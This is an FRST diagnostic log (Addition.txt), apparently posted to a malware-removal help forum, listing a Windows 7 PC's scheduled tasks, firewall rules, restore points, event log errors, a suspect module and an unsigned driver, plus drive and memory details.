Task: {B357887E-D687-41F0-BC9B-69046826C8B9} - System32\Tasks\{390B4BC4-913C-42CB-8F5F-90341B4FC536} => pcalua.exe -a C:\Users\HP\Desktop\dotnetfx35.exe -d C:\Users\HP\Desktop

Task: {D8CB8877-7922-4C86-B334-D3C83957C2C5} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-04-12] (Adobe Systems Incorporated)

Task: {DC6DE3CF-AD1E-4080-A50D-071E517F7760} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-02-03] (Adobe Systems Incorporated)

Task: {EDAC11F3-0ABA-47D3-93B3-5907AD49E321} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_25_0_0_148_pepper.exe [2017-04-12] (Adobe Systems Incorporated)

Task: {F4938FDB-88AC-456F-AF11-0A6896012023} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office\Office15\msoia.exe [2012-10-01] (Microsoft Corporation)

Task: {F7AF3418-358E-4609-9103-5FFAF7774AB2} - System32\Tasks\{86222619-D61C-4F8D-A492-9008F70161F8} => pcalua.exe -a "C:\Users\HP\Downloads\[PC] Medal of Honor Airborne [RIP] [dopeman]\MOHA\Medal of Honor Airborne\UnrealEngine3\Binaries\moha_setup.exe" -d "C:\Users\HP\Downloads\[PC] Medal of Honor Airborne [RIP] [dopeman]\MOHA\Medal of Honor Airborne\UnrealEngine3\Binaries" -c dxlevel 91

Task: {FCAC6AD3-34A7-4EF5-9186-B83F0C45FD1E} - System32\Tasks\Lenovo\Lenovo Customer Feedback Program 64 35 => %ProgramFiles(x86)%\Lenovo\Customer Feedback Program 35\Lenovo.TVT.CustomerFeedback.Agent35.exe 

 

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

 

 

==================== Shortcuts =============================

 

(The entries could be listed to be restored or removed.)

 

ShortcutWithArgument: C:\Users\HP\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> %SNP%

ShortcutWithArgument: C:\Users\HP\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> %SNP%

 

==================== Loaded Modules (Whitelisted) ==============

 

2012-10-01 20:34 - 2012-10-01 20:34 - 06522480 _____ () C:\Program Files\Microsoft Office\Office15\1033\GrooveIntlResource.dll

2017-04-23 09:12 - 2017-04-23 09:07 - 03780096 _____ () C:\ProgramData\Logic Cramble\set.exe

2017-04-07 20:02 - 2017-03-29 11:47 - 02885464 _____ () C:\Program Files (x86)\Google\Chrome\Application\57.0.2987.133\libglesv2.dll

2017-04-07 20:02 - 2017-03-29 11:47 - 00099672 _____ () C:\Program Files (x86)\Google\Chrome\Application\57.0.2987.133\libegl.dll

 

==================== Alternate Data Streams (Whitelisted) =========

 

(If an entry is included in the fixlist, only the ADS will be removed.)

 

 

==================== Safe Mode (Whitelisted) ===================

 

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

 

 

==================== Association (Whitelisted) ===============

 

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

 

 

==================== Internet Explorer trusted/restricted ===============

 

(If an entry is included in the fixlist, it will be removed from the registry.)

 

 

==================== Hosts content: ===============================

 

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

 

2009-07-14 05:34 - 2017-04-21 08:55 - 00007289 ____A C:\Windows\system32\Drivers\etc\hosts

 

 

==================== Other Areas ============================

 

(Currently there is no automatic fix for this section.)

 

HKU\S-1-5-21-1988295413-3700943990-1798627009-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\HP\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg

DNS Servers: 41.212.0.100 - 41.212.0.101

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)

Windows Firewall is enabled.

 

==================== MSCONFIG/TASK MANAGER disabled items ==

 

 

==================== FirewallRules (Whitelisted) ===============

 

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

 

FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe

FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe

FirewallRules: [TCP Query User{3752FBB6-E10F-4E16-922A-1DF58A9C5F3A}C:\users\hp\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\hp\appdata\roaming\utorrent\utorrent.exe

FirewallRules: [UDP Query User{3F19B3E1-2EA8-4345-B0E0-FAC8D867E2FD}C:\users\hp\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\hp\appdata\roaming\utorrent\utorrent.exe

FirewallRules: [{4549F749-3343-4569-93A9-5E66F635C809}] => (Block) C:\users\hp\appdata\roaming\utorrent\utorrent.exe

FirewallRules: [{9DB22D8B-8C1C-4582-B3C5-8D6CBFF78D1B}] => (Block) C:\users\hp\appdata\roaming\utorrent\utorrent.exe

FirewallRules: [TCP Query User{FC7F84DB-8CB3-4283-A480-362183A28CA0}C:\program files (x86)\google\chrome\application\chrome.exe] => (Allow) C:\program files (x86)\google\chrome\application\chrome.exe

FirewallRules: [UDP Query User{65044257-5788-4D97-B5CD-BAE6BD1538E0}C:\program files (x86)\google\chrome\application\chrome.exe] => (Allow) C:\program files (x86)\google\chrome\application\chrome.exe

 

==================== Restore Points =========================

 

19-04-2017 16:00:23 Windows Update

21-04-2017 07:49:48 Windows Update

21-04-2017 10:10:40 Windows Update

21-04-2017 20:00:16 Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215

21-04-2017 20:00:59 Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24210

21-04-2017 20:01:28 Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215

21-04-2017 20:01:56 Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24210

23-04-2017 09:18:45 Windows Update

23-04-2017 14:57:59 Restore Point Created by FRST

23-04-2017 15:08:56 JRT Pre-Junkware Removal

23-04-2017 16:52:14 Restore Point Created by FRST

23-04-2017 16:57:48 JRT Pre-Junkware Removal

 

==================== Faulty Device Manager Devices =============

 

Name: 

Description: 

Class Guid: 

Manufacturer: 

Service: 

Problem: : The drivers for this device are not installed. (Code 28)

Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

 

Name: USB Input Device

Description: USB Input Device

Class Guid: {745a17a0-74d3-11d0-b6fe-00a0c90f57da}

Manufacturer: (Standard system devices)

Service: HidUsb

Problem: : This device cannot start. (Code10)

Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.

On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.

 

 

==================== Event log errors: =========================

 

Application errors:

==================

Error: (04/23/2017 04:52:17 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )

Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.

 

Details:

AddLegacyDriverFiles: Unable to back up image of binary {df06148f-d289-4e33-a087-33e2aa940789}Gw64.

 

System Error:

The system cannot find the file specified.

.

 

Error: (04/23/2017 03:01:13 PM) (Source: EventSystem) (EventID: 4621) (User: )

Description: The COM+ Event System could not remove the EventSystem.EventSubscription object {F55E4282-CE4F-4785-B5C8-29D60709F8AF}-{00000000-0000-0000-0000-000000000000}-{00000000-0000-0000-0000-000000000000}.

Object name: SENS Logon Subscription

Object description: 

The HRESULT was 80070005.

 

Error: (04/23/2017 12:34:15 PM) (Source: Application Hang) (EventID: 1002) (User: )

Description: The program samp.exe version 0.0.0.0 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

 

Process ID: 6b0

 

Start Time: 01d2bc14c1072935

 

Termination Time: 2

 

Application Path: C:\Games\Grand Theft Auto SA-MP\samp.exe

 

Report Id: 0252a2f1-2808-11e7-8046-acd1b80f54a8

 

Error: (04/23/2017 12:05:01 PM) (Source: Application Error) (EventID: 1000) (User: )

Description: Faulting application name: IMRP.Launcher.exe, version: 1.0.5661.21673, time stamp: 0x55950c32

Faulting module name: KERNELBASE.dll, version: 6.1.7600.16385, time stamp: 0x4a5bdbdf

Exception code: 0xe0434352

Fault offset: 0x0000b727

Faulting process id: 0x15c0

Faulting application start time: 0x01d2bc10a65ba164

Faulting application path: C:\Users\HP\Desktop\IMRP.Launcher.exe

Faulting module path: C:\Windows\syswow64\KERNELBASE.dll

Report Id: ee0e7390-2803-11e7-8046-acd1b80f54a8

 

Error: (04/23/2017 12:05:00 PM) (Source: .NET Runtime) (EventID: 1026) (User: )

Description: Application: IMRP.Launcher.exe

Framework Version: v4.0.30319

Description: The process was terminated due to an unhandled exception.

Exception Info: System.InvalidOperationException

Stack:

   at System.Windows.Forms.Control.MarshaledInvoke(System.Windows.Forms.Control, System.Delegate, System.Object[], Boolean)

   at System.Windows.Forms.Control.Invoke(System.Delegate, System.Object[])

   at SAMP.Launcher.UpdateForm.UpdateAction(System.String)

   at SAMP.Launcher.Updater.Update()

   at SAMP.Launcher.Updater.Run(SAMP.Launcher.UpdateForm)

   at SAMP.Launcher.UpdateForm.<UpdateForm_Load>b__0()

   at System.Threading.ThreadHelper.ThreadStart_Context(System.Object)

   at System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)

   at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)

   at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object)

   at System.Threading.ThreadHelper.ThreadStart()

 

Error: (04/23/2017 11:39:25 AM) (Source: Application Error) (EventID: 1000) (User: )

Description: Faulting application name: gta_sa.exe, version: 0.0.0.0, time stamp: 0x427101ca

Faulting module name: samp.dll, version: 0.3.7.0, time stamp: 0x5542f47a

Exception code: 0xc0000005

Fault offset: 0x0005c7f0

Faulting process id: 0x7f0

Faulting application start time: 0x01d2bc0d163f7d35

Faulting application path: C:\Games\Grand Theft Auto SA-MP\gta_sa.exe

Faulting module path: C:\Games\Grand Theft Auto SA-MP\samp.dll

Report Id: 5a8aad9f-2800-11e7-8046-acd1b80f54a8

 

Error: (04/23/2017 11:35:35 AM) (Source: Application Error) (EventID: 1000) (User: )

Description: Faulting application name: gta_sa.exe, version: 0.0.0.0, time stamp: 0x427101ca

Faulting module name: samp.dll, version: 0.3.7.0, time stamp: 0x5542f47a

Exception code: 0xc0000005

Fault offset: 0x0005c7f0

Faulting process id: 0xfec

Faulting application start time: 0x01d2bc0c8d68a576

Faulting application path: C:\Games\Grand Theft Auto SA-MP\gta_sa.exe

Faulting module path: C:\Games\Grand Theft Auto SA-MP\samp.dll

Report Id: d1b9a255-27ff-11e7-8046-acd1b80f54a8

 

Error: (04/23/2017 10:40:45 AM) (Source: Application Hang) (EventID: 1002) (User: )

Description: The program ProjectZomboid32.exe version 0.0.0.0 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

 

Process ID: 1704

 

Start Time: 01d2bc00b0f5ea26

 

Termination Time: 9854

 

Application Path: C:\Program Files (x86)\Steam\steamapps\common\ProjectZomboid\ProjectZomboid32.exe

 

Report Id: 16f1277f-27f8-11e7-8046-acd1b80f54a8

 

Error: (04/22/2017 12:17:55 PM) (Source: Application Hang) (EventID: 1002) (User: )

Description: The program samp.exe version 0.0.0.0 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

 

Process ID: a24

 

Start Time: 01d2bb4944768846

 

Termination Time: 9

 

Application Path: C:\Games\Grand Theft Auto SA-MP\samp.exe

 

Report Id: 8fbf5fe5-273c-11e7-8046-acd1b80f54a8

 

Error: (04/22/2017 08:30:58 AM) (Source: EventSystem) (EventID: 4621) (User: )

Description: The COM+ Event System could not remove the EventSystem.EventSubscription object {F55E4282-CE4F-4785-B5C8-29D60709F8AF}-{00000000-0000-0000-0000-000000000000}-{00000000-0000-0000-0000-000000000000}.

Object name: SENS Logon Subscription

Object description: 

The HRESULT was 80070005.

 

 

System errors:

=============

Error: (04/23/2017 04:54:41 PM) (Source: Service Control Manager) (EventID: 7000) (User: )

Description: The atksgt service failed to start due to the following error: 

Windows cannot verify the digital signature for this file. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

 

Error: (04/23/2017 04:52:57 PM) (Source: Service Control Manager) (EventID: 7032) (User: )

Description: The Service Control Manager tried to take a corrective action (Restart the service) after the unexpected termination of the Windows Search service, but this action failed with the following error: 

An instance of the service is already running.

 

Error: (04/23/2017 04:52:27 PM) (Source: Service Control Manager) (EventID: 7031) (User: )

Description: The Windows Search service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 30000 milliseconds: Restart the service.

 

Error: (04/23/2017 04:52:27 PM) (Source: Service Control Manager) (EventID: 7034) (User: )

Description: The Skype Click to Call PNR Service service terminated unexpectedly.  It has done this 1 time(s).

 

Error: (04/23/2017 04:52:27 PM) (Source: Service Control Manager) (EventID: 7031) (User: )

Description: The Windows Media Player Network Sharing Service service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 30000 milliseconds: Restart the service.

 

Error: (04/23/2017 04:52:27 PM) (Source: Service Control Manager) (EventID: 7034) (User: )

Description: The Background Logic Handler service terminated unexpectedly.  It has done this 1 time(s).

 

Error: (04/23/2017 04:52:26 PM) (Source: Service Control Manager) (EventID: 7031) (User: )

Description: The Windows Presentation Foundation Font Cache 3.0.0.0 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 0 milliseconds: Restart the service.

 

Error: (04/23/2017 04:52:26 PM) (Source: Service Control Manager) (EventID: 7031) (User: )

Description: The Windows Live ID Sign-in Assistant service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.

 

Error: (04/23/2017 04:52:26 PM) (Source: Service Control Manager) (EventID: 7034) (User: )

Description: The Skype Click to Call Updater service terminated unexpectedly.  It has done this 1 time(s).

 

Error: (04/23/2017 04:52:26 PM) (Source: Service Control Manager) (EventID: 7034) (User: )

Description: The Adobe Acrobat Update Service service terminated unexpectedly.  It has done this 1 time(s).

 

 

CodeIntegrity:

===================================

  Date: 2017-04-23 16:54:41.388

  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\atksgt.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

 

  Date: 2017-04-23 16:54:41.388

  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\atksgt.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

 

  Date: 2017-04-23 15:02:19.143

  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\atksgt.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

 

  Date: 2017-04-23 15:02:19.143

  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\atksgt.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

 

  Date: 2017-04-22 08:56:34.806

  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\atksgt.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

 

  Date: 2017-04-22 08:56:34.806

  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\atksgt.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

 

  Date: 2017-04-22 08:48:57.263

  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\atksgt.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

 

  Date: 2017-04-22 08:48:57.247

  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\atksgt.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

 

  Date: 2017-04-22 08:38:27.771

  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\atksgt.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

 

  Date: 2017-04-22 08:38:27.771

  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\atksgt.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

 

 

==================== Memory info =========================== 

 

Processor: Intel® Core™ i3-4005U CPU @ 1.70GHz

Percentage of memory in use: 53%

Total physical RAM: 4032.3 MB

Available physical RAM: 1860.02 MB

Total Virtual: 8062.74 MB

Available Virtual: 5807.7 MB

 

==================== Drives ================================

 

Drive c: () (Fixed) (Total:146.39 GB) (Free:89.69 GB) NTFS

Drive d: () (Fixed) (Total:319.28 GB) (Free:319.18 GB) NTFS

 

==================== MBR & Partition Table ==================

 

========================================================

Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 397A8933)

Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)

Partition 2: (Not Active) - (Size=146.4 GB) - (Type=07 NTFS)

Partition 3: (Not Active) - (Size=319.3 GB) - (Type=07 NTFS)

 

==================== End of Addition.txt ============================

 

Edited by Khazard, 23 April 2017 - 08:09 AM.